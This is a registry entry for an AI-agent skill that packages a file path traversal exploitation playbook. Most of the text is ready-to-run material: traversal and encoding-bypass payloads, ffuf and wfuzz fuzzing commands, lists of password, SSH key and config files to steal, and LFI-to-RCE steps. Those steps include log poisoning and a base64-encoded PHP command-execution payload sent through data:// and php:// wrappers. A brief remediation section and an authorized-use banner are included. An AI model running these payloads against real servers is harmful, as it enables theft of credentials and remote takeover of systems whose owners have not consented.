{"id":"e84f7707-7076-481e-9748-aba1e46034e2","shortId":"n4BkMQ","kind":"skill","title":"file-path-traversal","tagline":"Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# File Path Traversal Testing\n\n## Purpose\n\nIdentify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.\n\n## Prerequisites\n\n### Required Tools\n- Web browser with developer tools\n- Burp Suite or OWASP ZAP\n- cURL for testing payloads\n- Wordlists for automation\n- ffuf or wfuzz for fuzzing\n\n### Required Knowledge\n- HTTP request/response structure\n- Linux and Windows filesystem layout\n- Web application architecture\n- Basic understanding of file APIs\n\n## Outputs and Deliverables\n\n1. **Vulnerability Report** - Identified traversal points and severity\n2. **Exploitation Proof** - Extracted file contents\n3. **Impact Assessment** - Accessible files and data exposure\n4. **Remediation Guidance** - Secure coding recommendations\n\n## Core Workflow\n\n### Phase 1: Understanding Path Traversal\n\nPath traversal occurs when applications use user input to construct file paths:\n\n```php\n// Vulnerable PHP code example\n$template = \"blue.php\";\nif (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {\n $template = $_COOKIE['template'];\n}\ninclude(\"/home/user/templates/\" . $template);\n```\n\nAttack principle:\n- `../` sequence moves up one directory\n- Chain multiple sequences to reach root\n- Access files outside intended directory\n\nImpact:\n- **Confidentiality** - Read sensitive files\n- **Integrity** - Write/modify files (in some cases)\n- **Availability** - Delete files (in some cases)\n- **Code Execution** - If combined with file upload or log poisoning\n\n### Phase 2: Identifying Traversal Points\n\nMap application for potential file operations:\n\n```bash\n# Parameters that often handle files\n?file=\n?path=\n?page=\n?template=\n?filename=\n?doc=\n?document=\n?folder=\n?dir=\n?include=\n?src=\n?source=\n?content=\n?view=\n?download=\n?load=\n?read=\n?retrieve=\n```\n\nCommon vulnerable functionality:\n- Image loading: `/image?filename=23.jpg`\n- Template selection: `?template=blue.php`\n- File downloads: `/download?file=report.pdf`\n- Document viewers: `/view?doc=manual.pdf`\n- Include mechanisms: `?page=about`\n\n### Phase 3: Basic Exploitation Techniques\n\n#### Simple Path Traversal\n\n```bash\n# Basic Linux traversal\n../../../etc/passwd\n../../../../etc/passwd\n../../../../../etc/passwd\n../../../../../../etc/passwd\n\n# Windows traversal\n..\\..\\..\\windows\\win.ini\n..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts\n\n# URL encoded\n..%2F..%2F..%2Fetc%2Fpasswd\n..%252F..%252F..%252Fetc%252Fpasswd # Double encoding\n\n# Test payloads with curl\ncurl \"http://target.com/image?filename=../../../etc/passwd\"\ncurl \"http://target.com/download?file=....//....//....//etc/passwd\"\n```\n\n#### Absolute Path Injection\n\n```bash\n# Direct absolute path (Linux)\n/etc/passwd\n/etc/shadow\n/etc/hosts\n/proc/self/environ\n\n# Direct absolute path (Windows)\nC:\\windows\\win.ini\nC:\\windows\\system32\\drivers\\etc\\hosts\nC:\\boot.ini\n```\n\n### Phase 4: Bypass Techniques\n\n#### Bypass Stripped Traversal Sequences\n\n```bash\n# When ../ is stripped once\n....//....//....//etc/passwd\n....\\/....\\/....\\/etc/passwd\n\n# Nested traversal\n..././..././..././etc/passwd\n....//....//etc/passwd\n\n# Mixed encoding\n..%2f..%2f..%2fetc/passwd\n%2e%2e/%2e%2e/%2e%2e/etc/passwd\n%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\n```\n\n#### Bypass Extension Validation\n\n```bash\n# Null byte injection (older PHP versions)\n../../../etc/passwd%00.jpg\n../../../etc/passwd%00.png\n\n# Path truncation\n../../../etc/passwd...............................\n\n# Double extension\n../../../etc/passwd.jpg.php\n```\n\n#### Bypass Base Directory Validation\n\n```bash\n# When path must start with expected directory\n/var/www/images/../../../etc/passwd\n\n# Expected path followed by traversal\nimages/../../../etc/passwd\n```\n\n#### Bypass Blacklist Filters\n\n```bash\n# Unicode/UTF-8 encoding\n..%c0%af..%c0%af..%c0%afetc/passwd\n..%c1%9c..%c1%9c..%c1%9cetc/passwd\n\n# Overlong UTF-8 encoding\n%c0%2e%c0%2e%c0%af\n\n# URL encoding variations\n%2e%2e/\n%2e%2e%5c\n..%5c\n..%255c\n\n# Case variations (Windows)\n....\\\\....\\\\etc\\\\passwd\n```\n\n### Phase 5: Linux Target Files\n\nHigh-value files to target:\n\n```bash\n# System files\n/etc/passwd # User accounts\n/etc/shadow # Password hashes (root only)\n/etc/group # Group information\n/etc/hosts # Host mappings\n/etc/hostname # System hostname\n/etc/issue # System banner\n\n# SSH files\n/root/.ssh/id_rsa # Root private key\n/root/.ssh/authorized_keys # Authorized keys\n/home//.ssh/id_rsa # User private keys\n/etc/ssh/sshd_config # SSH configuration\n\n# Web server files\n/etc/apache2/apache2.conf\n/etc/nginx/nginx.conf\n/etc/apache2/sites-enabled/000-default.conf\n/var/log/apache2/access.log\n/var/log/apache2/error.log\n/var/log/nginx/access.log\n\n# Application files\n/var/www/html/config.php\n/var/www/html/wp-config.php\n/var/www/html/.htaccess\n/var/www/html/web.config\n\n# Process information\n/proc/self/environ # Environment variables\n/proc/self/cmdline # Process command line\n/proc/self/fd/0 # File descriptors\n/proc/version # Kernel version\n\n# Common application configs\n/etc/mysql/my.cnf\n/etc/postgresql/*/postgresql.conf\n/opt/lampp/etc/httpd.conf\n```\n\n### Phase 6: Windows Target Files\n\nWindows-specific targets:\n\n```bash\n# System files\nC:\\windows\\win.ini\nC:\\windows\\system.ini\nC:\\boot.ini\nC:\\windows\\system32\\drivers\\etc\\hosts\nC:\\windows\\system32\\config\\SAM\nC:\\windows\\repair\\SAM\n\n# IIS files\nC:\\inetpub\\wwwroot\\web.config\nC:\\inetpub\\logs\\LogFiles\\W3SVC1\\\n\n# Configuration files\nC:\\xampp\\apache\\conf\\httpd.conf\nC:\\xampp\\mysql\\data\\mysql\\user.MYD\nC:\\xampp\\passwords.txt\nC:\\xampp\\phpmyadmin\\config.inc.php\n\n# User files\nC:\\Users\\\\.ssh\\id_rsa\nC:\\Users\\\\Desktop\\\nC:\\Documents and Settings\\\\\n```\n\n### Phase 7: Automated Testing\n\n#### Using Burp Suite\n\n```\n1. Capture request with file parameter\n2. Send to Intruder\n3. Mark file parameter value as payload position\n4. Load path traversal wordlist\n5. Start attack\n6. Filter responses by size/content for success\n```\n\n#### Using ffuf\n\n```bash\n# Basic traversal fuzzing\nffuf -u \"http://target.com/image?filename=FUZZ\" \\\n -w /usr/share/wordlists/traversal.txt \\\n -mc 200\n\n# Fuzzing with encoding\nffuf -u \"http://target.com/page?file=FUZZ\" \\\n -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \\\n -mc 200,500 -ac\n```\n\n#### Using wfuzz\n\n```bash\n# Traverse to /etc/passwd\nwfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \\\n --hc 404 \\\n \"http://target.com/index.php?file=FUZZ\"\n\n# With headers/cookies\nwfuzz -c -z file,traversal.txt \\\n -H \"Cookie: session=abc123\" \\\n \"http://target.com/load?path=FUZZ\"\n```\n\n### Phase 8: LFI to RCE Escalation\n\n#### Log Poisoning\n\n```bash\n# Inject PHP code into logs\ncurl -A \"\" http://target.com/\n\n# Include Apache log file\ncurl \"http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id\"\n\n# Include auth.log (SSH)\n# First: ssh ''@target.com\ncurl \"http://target.com/page?file=../../../var/log/auth.log&cmd=whoami\"\n```\n\n#### Proc/self/environ\n\n```bash\n# Inject via User-Agent\ncurl -A \"\" \\\n \"http://target.com/page?file=/proc/self/environ\"\n\n# With command parameter\ncurl -A \"\" \\\n \"http://target.com/page?file=/proc/self/environ&c=whoami\"\n```\n\n#### PHP Wrapper Exploitation\n\n```bash\n# php://filter - Read source code as base64\ncurl \"http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php\"\n\n# php://input - Execute POST data as PHP\ncurl -X POST -d \"\" \\\n \"http://target.com/page?file=php://input\"\n\n# data:// - Execute inline PHP\ncurl \"http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id\"\n\n# expect:// - Execute system commands\ncurl \"http://target.com/page?file=expect://id\"\n```\n\n### Phase 9: Testing Methodology\n\nStructured testing approach:\n\n```bash\n# Step 1: Identify potential parameters\n# Look for file-related functionality\n\n# Step 2: Test basic traversal\n../../../etc/passwd\n\n# Step 3: Test encoding variations\n..%2F..%2F..%2Fetc%2Fpasswd\n%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\n\n# Step 4: Test bypass techniques\n....//....//....//etc/passwd\n..;/..;/..;/etc/passwd\n\n# Step 5: Test absolute paths\n/etc/passwd\n\n# Step 6: Test with null bytes (legacy)\n../../../etc/passwd%00.jpg\n\n# Step 7: Attempt wrapper exploitation\nphp://filter/convert.base64-encode/resource=index.php\n\n# Step 8: Attempt log poisoning for RCE\n```\n\n### Phase 10: Prevention Measures\n\nSecure coding practices:\n\n```php\n// PHP: Use basename() to strip paths\n$filename = basename($_GET['file']);\n$path = \"/var/www/files/\" . $filename;\n\n// PHP: Validate against whitelist\n$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];\nif (in_array($_GET['file'], $allowed)) {\n include(\"/var/www/files/\" . $_GET['file']);\n}\n\n// PHP: Canonicalize and verify base path\n$base = \"/var/www/files/\";\n$realBase = realpath($base);\n$userPath = $base . $_GET['file'];\n$realUserPath = realpath($userPath);\n\nif ($realUserPath && strpos($realUserPath, $realBase) === 0) {\n include($realUserPath);\n}\n```\n\n```python\n# Python: Use os.path.realpath() and validate\nimport os\n\ndef safe_file_access(base_dir, filename):\n # Resolve to absolute path\n base = os.path.realpath(base_dir)\n file_path = os.path.realpath(os.path.join(base, filename))\n \n # Verify file is within base directory\n if file_path.startswith(base):\n return open(file_path, 'r').read()\n else:\n raise Exception(\"Access denied\")\n```\n\n## Quick Reference\n\n### Common Payloads\n\n| Payload | Target |\n|---------|--------|\n| `../../../etc/passwd` | Linux password file |\n| `..\\..\\..\\..\\windows\\win.ini` | Windows INI file |\n| `....//....//....//etc/passwd` | Bypass simple filter |\n| `/etc/passwd` | Absolute path |\n| `php://filter/convert.base64-encode/resource=config.php` | Source code |\n\n### Target Files\n\n| OS | File | Purpose |\n|----|------|---------|\n| Linux | `/etc/passwd` | User accounts |\n| Linux | `/etc/shadow` | Password hashes |\n| Linux | `/proc/self/environ` | Environment vars |\n| Windows | `C:\\windows\\win.ini` | System config |\n| Windows | `C:\\boot.ini` | Boot config |\n| Web | `wp-config.php` | WordPress DB creds |\n\n### Encoding Variants\n\n| Type | Example |\n|------|---------|\n| URL Encoding | `%2e%2e%2f` = `../` |\n| Double Encoding | `%252e%252e%252f` = `../` |\n| Unicode | `%c0%af` = `/` |\n| Null Byte | `%00` |\n\n## Constraints and Limitations\n\n### Permission Restrictions\n- Cannot read files application user cannot access\n- Shadow file requires root privileges\n- Many files have restrictive permissions\n\n### Application Restrictions\n- Extension validation may limit file types\n- Base path validation may restrict scope\n- WAF may block common payloads\n\n### Testing Considerations\n- Respect authorized scope\n- Avoid accessing genuinely sensitive data\n- Document all successful access\n\n## Troubleshooting\n\n| Problem | Solutions |\n|---------|-----------|\n| No response difference | Try encoding, blind traversal, different files |\n| Payload blocked | Use encoding variants, nested sequences, case variations |\n| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["file","path","traversal","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-file-path-traversal","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/file-path-traversal","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34793 github stars · SKILL.md body (11,651 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-24T00:50:56.344Z","embedding":null,"createdAt":"2026-04-18T21:37:10.976Z","updatedAt":"2026-04-24T00:50:56.344Z","lastSeenAt":"2026-04-24T00:50:56.344Z","tsv":"'-8':493 '/../../../../../etc/passwd':333 '/../../../../etc/passwd':332 '/../../../etc/passwd':331 '/../../etc/passwd':330,444,446,450,921,961,1097 '/../../etc/passwd.jpg.php':453 '/./etc/passwd':411 '/.ssh/id_rsa':560 '/download':306 '/download?file=....//....//....//etc/passwd':366 '/etc/apache2/apache2.conf':570 '/etc/apache2/sites-enabled/000-default.conf':572 '/etc/group':538 '/etc/hostname':544 '/etc/hosts':377,541 '/etc/issue':547 '/etc/mysql/my.cnf':600 '/etc/nginx/nginx.conf':571 '/etc/passwd':375,407,408,412,530,758,946,947,953,1106,1110,1123 '/etc/postgresql':601 '/etc/shadow':376,533,1127 '/etc/ssh/sshd_config':564 '/home':559 '/home/user/templates':210 '/image':297 '/image?filename=../../../etc/passwd':362 '/image?filename=fuzz':734 '/index.php?file=fuzz':768 '/load?path=fuzz':782 '/opt/lampp/etc/httpd.conf':603 '/page?file=../../../var/log/apache2/access.log&cmd=id':811 '/page?file=../../../var/log/auth.log&cmd=whoami':825 '/page?file=/proc/self/environ':840 '/page?file=/proc/self/environ&c=whoami':852 '/page?file=data://text/plain;base64,pd9wahagc3lzdgvtkcrfr0vuwydjj10poya/pg==&c=id':889 '/page?file=expect://id':896 '/page?file=fuzz':746 '/page?file=php://filter/convert.base64-encode/resource=config.php':866 '/page?file=php://input':882 '/postgresql.conf':602 '/proc/self/cmdline':587 '/proc/self/environ':378,584,1131 '/proc/self/fd/0':591 '/proc/version':594 '/root/.ssh/authorized_keys':556 '/root/.ssh/id_rsa':552 '/usr/share/seclists/fuzzing/lfi/lfi-jhaddix.txt':748,763 '/usr/share/wordlists/traversal.txt':736 '/var/log/apache2/access.log':573 '/var/log/apache2/error.log':574 '/var/log/nginx/access.log':575 '/var/www/files':996,1013,1023 '/var/www/html/.htaccess':580 '/var/www/html/config.php':578 '/var/www/html/web.config':581 '/var/www/html/wp-config.php':579 '/var/www/images/../../../etc/passwd':466 '/view':311 '0':1039 '00':1169 '00.jpg':445,962 '00.png':447 '1':145,176,691,906 '10':978 '2':153,258,697,917 '200':738,750 '23.jpg':299 '252e':1161,1162 '252f':349,350,1163 '252fetc':351 '252fpasswd':352 '255c':510 '2e':418,419,420,421,422,424,425,427,428,430,431,496,498,504,505,506,507,931,932,934,935,937,938,1156,1157 '2e/etc/passwd':423 '2f':345,346,415,416,426,429,927,928,933,936,1158 '2fetc':347,432,929,939 '2fetc/passwd':417 '2fpasswd':348,433,930,940 '3':159,319,701,923 '4':167,395,709,942 '404':765 '5':517,714,949 '500':751 '5c':508,509 '6':605,717,955 '7':685,964 '8':784,971 '9':898 '9c':486,488 '9cetc/passwd':490 'abc123':779 'absolut':367,372,380,951,1059,1111 'ac':752 'access':162,225,1053,1089,1181,1217,1224 'account':532,1125 'action':1270 'af':480,482,500,1166 'afetc/passwd':484 'agent':832 'allow':15,65,1002,1011 'apach':654,805 'api':95,141 'applic':135,184,263,576,598,1178,1192,1264 'approach':903 'arbitrari':19,69 'architectur':136 'array':1008 'assess':43,161 'attack':16,66,212,716 'attempt':965,972 'auth.log':813 'author':33,41,557,1214 'autom':118,686 'avail':241 'avoid':1216 'banner':549 'base':455,1020,1022,1026,1028,1054,1061,1063,1069,1075,1079,1200 'base64':862 'basenam':987,992 'bash':268,326,370,402,437,458,476,527,613,726,755,791,827,856,904 'basic':137,320,327,727,919 'blacklist':474 'blind':1233 'block':1208,1238 'blue.php':198,303 'boot':1143 'boot.ini':393,623,1142 'browser':103 'burp':107,689 'bypass':396,398,434,454,473,944,1107 'byte':439,959,1168 'c':383,386,392,616,619,622,624,630,635,641,645,652,657,663,666,672,677,680,760,772,849,1135,1141 'c0':479,481,483,495,497,499,1165 'c1':485,487,489 'cannot':1175,1180,1246 'canonic':1017 'captur':692 'case':240,246,511,1244 'chain':219 'check':1250 'cmd':802,820 'code':32,82,171,195,247,794,860,982,1116 'combin':250 'command':589,842,892 'common':292,597,1093,1209 'conf':655 'confidenti':231 'config':599,633,1139,1144 'config.inc.php':669 'config.php':1114 'configur':27,77,566,650 'consider':1212 'constraint':1170 'construct':189 'content':158,286 'control':47,89 'cooki':201,204,207,777 'core':173 'cred':1149 'credenti':29,79 'curl':112,358,359,363,797,808,822,833,844,863,873,886,893 'd':876 'data':165,660,870,1220 'db':1148 'def':1050 'defens':44 'delet':242 'deliver':144 'deni':1090 'describ':1271 'descriptor':593 'desktop':679 'develop':105 'differ':1230,1235 'dir':282,1055,1064 'direct':371,379 'directori':11,61,218,229,456,465,1076 'doc':279,312 'document':280,309,681,1221 'doubl':353,451,1159 'download':288,305 'driver':340,389,627 'educ':48 'els':1086 'empti':203 'encod':344,354,414,478,494,502,741,925,1150,1155,1160,1232,1240 'environ':49,585,1132 'escal':788,1247 'etc':341,390,514,628 'exampl':196,1153 'except':1088 'execut':248,868,883,890,1266 'expect':464,467 'exploit':7,57,154,321,855,967 'exposur':166 'extens':435,452,1194 'extract':156 'ffuf':119,725,730,742 'file':2,8,20,28,50,58,70,78,140,157,163,190,226,234,237,243,252,266,273,274,304,307,520,524,529,551,569,577,592,608,615,640,651,671,695,703,762,774,807,913,994,1010,1015,1030,1052,1065,1072,1082,1100,1105,1118,1120,1177,1183,1188,1198,1236,1254 'file-path-travers':1 'file-rel':912 'file_path.startswith':1078 'filenam':278,298,991,997,1056,1070 'filesystem':94,132 'filter':475,718,857,1109 'filter/convert.base64-encode/resource':968,1113 'first':815 'folder':281 'follow':469 'function':294,915 'fuzz':123,729,739 'genuin':1218 'get':801,819,848,993,1009,1014,1029 'group':539 'guidanc':169 'guide.pdf':1005 'h':776 'handl':272 'hash':535,1129 'hc':764 'headers/cookies':770 'high':522 'high-valu':521 'host':342,391,542,629 'hostnam':546 'http':126 'httpd.conf':656 'id':675,837,879 'identifi':5,55,148,259,907 'ii':639 'imag':295 'images/../../../etc/passwd':472 'impact':160,230 'import':1048 'includ':25,75,209,283,314,804,812,1012,1040 'index.php':969 'inetpub':642,646 'inform':540,583 'ini':1104 'inject':369,440,792,828 'inlin':884 'input':90,187,867 'integr':235 'intend':228 'intrud':700 'isset':200 'kernel':595 'key':555,558,563 'knowledg':125 'layout':133 'legaci':960 'lfi':785 'limit':1172,1197 'line':590 'linux':129,328,374,518,1098,1122,1126,1130 'load':289,296,710 'log':255,647,789,796,806,973,1251 'logfil':648 'look':910 'mani':1187 'manual.pdf':313,1004 'map':262,543 'mark':702 'may':1196,1203,1207 'mc':737,749 'measur':980 'mechan':315 'methodolog':900 'mix':413 'move':215 'multipl':220 'must':461 'mysql':659,661 'nest':409,1242 'null':438,958,1167 'occur':85,182 'often':271 'older':441 'one':217 'open':1081 'oper':267 'os':1049,1119 'os.path.join':1068 'os.path.realpath':1045,1062,1067 'output':142 'outsid':227 'overlong':491 'overview':1274 'owasp':110 'page':276,316 'paramet':269,696,704,843,909 'pass':92 'passwd':515 'password':534,1099,1128 'passwords.txt':665 'path':3,9,51,59,178,180,191,275,324,368,373,381,448,460,468,711,952,990,995,1021,1060,1066,1083,1112,1201 'payload':115,356,707,1094,1095,1210,1237 'permiss':1173,1191 'phase':175,257,318,394,516,604,684,783,897,977 'php':192,194,442,793,799,817,835,846,853,872,877,885,984,985,998,1016,1252 'phpmyadmin':668 'point':150,261 'poison':256,790,974,1257 'posit':708 'post':869,875 'potenti':24,74,265,908 'practic':983 'prerequisit':99 'prevent':979 'principl':213 'privat':554,562 'privileg':1186 'problem':1226 'proc/self/environ':826 'process':582,588 'proof':155 'proper':97 'purpos':54,1121 'python':1042,1043 'quick':1091 'r':1084 'rais':1087 'rce':787,976,1249 'reach':223 'read':18,68,232,290,858,1085,1176 'realbas':1024,1038 'realpath':1025,1032 'realuserpath':1031,1035,1037,1041 'recommend':172 'refer':1092 'relat':914 'remedi':168 'repair':637 'report':147 'report.pdf':308,1003 'request':693 'request/response':127 'requir':100,124,1184 'resolv':1057 'respect':1213 'respons':719,1229 'restrict':1174,1190,1193,1204 'retriev':291 'return':1080 'root':224,536,553,1185 'rsa':676 'safe':1051 'sam':634,638 'scope':1205,1215 'secur':42,170,981 'select':301 'send':698 'sensit':26,76,233,1219 'sequenc':214,221,401,1243 'server':23,73,568 'session':778,1256 'set':683 'sever':152 'shadow':1182 'simpl':323,1108 'size/content':721 'skill':38,1262 'skill-file-path-traversal' 'solut':1227 'sourc':31,81,285,859,1115 'source-sickn33' 'specif':611 'src':284 'ssh':550,565,674,814,816 'start':462,715 'step':905,916,922,941,948,954,963,970 'strip':399,405,989 'strpos':1036 'structur':128,901 'success':723,1223 'suit':108,690 'system':528,545,548,614,800,818,836,847,878,891,1138 'system.ini':621 'system32':339,388,626,632 'target':519,526,607,612,1096,1117 'target.com':361,365,733,745,767,781,803,810,821,824,839,851,865,881,888,895 'target.com/download?file=....//....//....//etc/passwd':364 'target.com/image?filename=../../../etc/passwd':360 'target.com/image?filename=fuzz':732 'target.com/index.php?file=fuzz':766 'target.com/load?path=fuzz':780 'target.com/page?file=../../../var/log/apache2/access.log&cmd=id':809 'target.com/page?file=../../../var/log/auth.log&cmd=whoami':823 'target.com/page?file=/proc/self/environ':838 'target.com/page?file=/proc/self/environ&c=whoami':850 'target.com/page?file=data://text/plain;base64,pd9wahagc3lzdgvtkcrfr0vuwydjj10poya/pg==&c=id':887 'target.com/page?file=expect://id':894 'target.com/page?file=fuzz':744 'target.com/page?file=php://filter/convert.base64-encode/resource=config.php':864 'target.com/page?file=php://input':880 'techniqu':322,397,945 'templat':197,202,205,206,208,211,277,300,302 'test':53,114,355,687,899,902,918,924,943,950,956,1211 'tool':101,106 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'travers':4,10,12,52,60,62,149,179,181,260,325,329,335,400,410,471,712,728,756,920,1234 'traversal.txt':775 'tri':1231 'troubleshoot':1225 'truncat':449 'type':1152,1199 'u':731,743 'understand':138,177 'unicod':1164 'unicode/utf-8':477 'upload':253,1255 'url':343,501,1154 'use':34,36,185,688,724,753,986,1044,1239,1260 'user':88,186,531,561,670,673,678,831,1124,1179 'user-ag':830 'user-control':87 'user.myd':662 'userpath':1027,1033 'utf':492 'valid':45,98,436,457,999,1047,1195,1202 'valu':523,705 'var':1133 'variabl':586 'variant':1151,1241 'variat':503,512,926,1245 'verifi':1019,1071 'version':443,596 'via':829 'view':287 'viewer':310 'vulner':13,63,84,146,193,293 'w':735,747 'w3svc1':649 'waf':1206 'web':102,134,567,1145 'web.config':644 'wfuzz':121,754,759,771 'whitelist':1001 'win.ini':337,385,618,1102,1137 'window':131,334,336,338,382,384,387,513,606,610,617,620,625,631,636,1101,1103,1134,1136,1140 'windows-specif':609 'within':1074 'without':96 'wordlist':116,713 'wordpress':1147 'workflow':174,1268 'wp-config.php':1146 'wrapper':854,966,1253 'write/modify':236 'wwwroot':643 'x':874 'xampp':653,658,664,667 'z':761,773 'zap':111","prices":[{"id":"9838491d-4a88-49a2-8c0c-af328c5c1798","listingId":"e84f7707-7076-481e-9748-aba1e46034e2","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:37:10.976Z"}],"sources":[{"listingId":"e84f7707-7076-481e-9748-aba1e46034e2","source":"github","sourceId":"sickn33/antigravity-awesome-skills/file-path-traversal","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/file-path-traversal","isPrimary":false,"firstSeenAt":"2026-04-18T21:37:10.976Z","lastSeenAt":"2026-04-24T00:50:56.344Z"}],"details":{"listingId":"e84f7707-7076-481e-9748-aba1e46034e2","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"file-path-traversal","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34793,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-24T00:28:59Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"b5745a05e16111cd8a58b60b110b03398881a425","skill_md_path":"skills/file-path-traversal/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/file-path-traversal"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"file-path-traversal","description":"Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/file-path-traversal"},"updatedAt":"2026-04-24T00:50:56.344Z"}}